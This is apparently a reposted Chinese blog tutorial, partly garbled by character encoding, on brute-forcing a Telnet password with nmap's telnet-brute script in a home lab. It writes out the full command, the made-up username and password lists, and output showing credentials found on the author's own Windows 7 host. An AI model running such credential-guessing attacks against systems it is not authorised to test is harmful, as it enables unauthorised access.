【20171115中】nmap 使用脚本爆破telnet密码
? 今天老黑走出了低谷,設(shè)置了懲罰機(jī)制后效率提升了很多,現(xiàn)在寫(xiě)一個(gè)使用nmap檢測(cè)目標(biāo)主機(jī)漏洞和利用漏洞的文章,話(huà)不多說(shuō),直接開(kāi)始!
0x01:環(huán)境介紹
主機(jī)A:系統(tǒng) - kali2017,IP -?192.168.1.104
主機(jī)B:系統(tǒng) - win7x64,IP -?192.168.1.103
使用主機(jī)A掃描并攻入主機(jī)B
0x02:確認(rèn)主機(jī)B開(kāi)啟了telnet的23端口
主機(jī)B沒(méi)有開(kāi)啟,我自己開(kāi)啟一下。
s1:控制面板 -> 程序 -> 打開(kāi)或關(guān)閉windows程序 -> 選中下圖選項(xiàng)框,點(diǎn)擊確認(rèn)后重啟系統(tǒng)。
s2:確認(rèn)計(jì)算機(jī)telnet服務(wù)是否已經(jīng)開(kāi)啟。打開(kāi)計(jì)算機(jī)右擊 -> 管理 -> 服務(wù)和應(yīng)用程序 -> 服務(wù) -> 找到Telnet服務(wù),并將其開(kāi)啟服務(wù)和設(shè)置自動(dòng)
0x03:在主機(jī)A掃描確認(rèn)主機(jī)B是否開(kāi)啟了23端口
0x04:進(jìn)行爆破
s1:參考官網(wǎng)了解,爆破命令如下
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>s2:制造自己的myusers.lst和mypwds.lst
老黑將自己的賬號(hào)AAAA放在myusers.lst中,如下:
AAAA AA22 ASDFSA SDSDD
將自己的密碼BBBB放在mypwds.lst中,如下:
BBBB BB23 DFASDFA SADFAA根據(jù)主機(jī)A的環(huán)境,調(diào)整命令,如下:
nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103s3:執(zhí)行命令,等待結(jié)果
root@l:~# nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-15 18:18 CST Nmap scan report for promote.cache-dns.local (192.168.1.103) Host is up (0.091s latency).PORT STATE SERVICE 23/tcp open telnet | telnet-brute: | Accounts: | AAAA:BBBB - Valid credentials |_ Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0 MAC Address: XXXXXXXXXXXXX (xxxxxxxxxxxx.)Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds
?
0x05:telnet登陸主機(jī)B,WELL DONE!
?
轉(zhuǎn)載于:https://www.cnblogs.com/heijuelou/p/7840371.html
總結(jié)
以上是生活随笔為你收集整理的【20171115中】nmap 使用脚本爆破telnet密码的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: [C#]关于Access的“INSERT
- 下一篇: C# 创建、部署、调用WebServic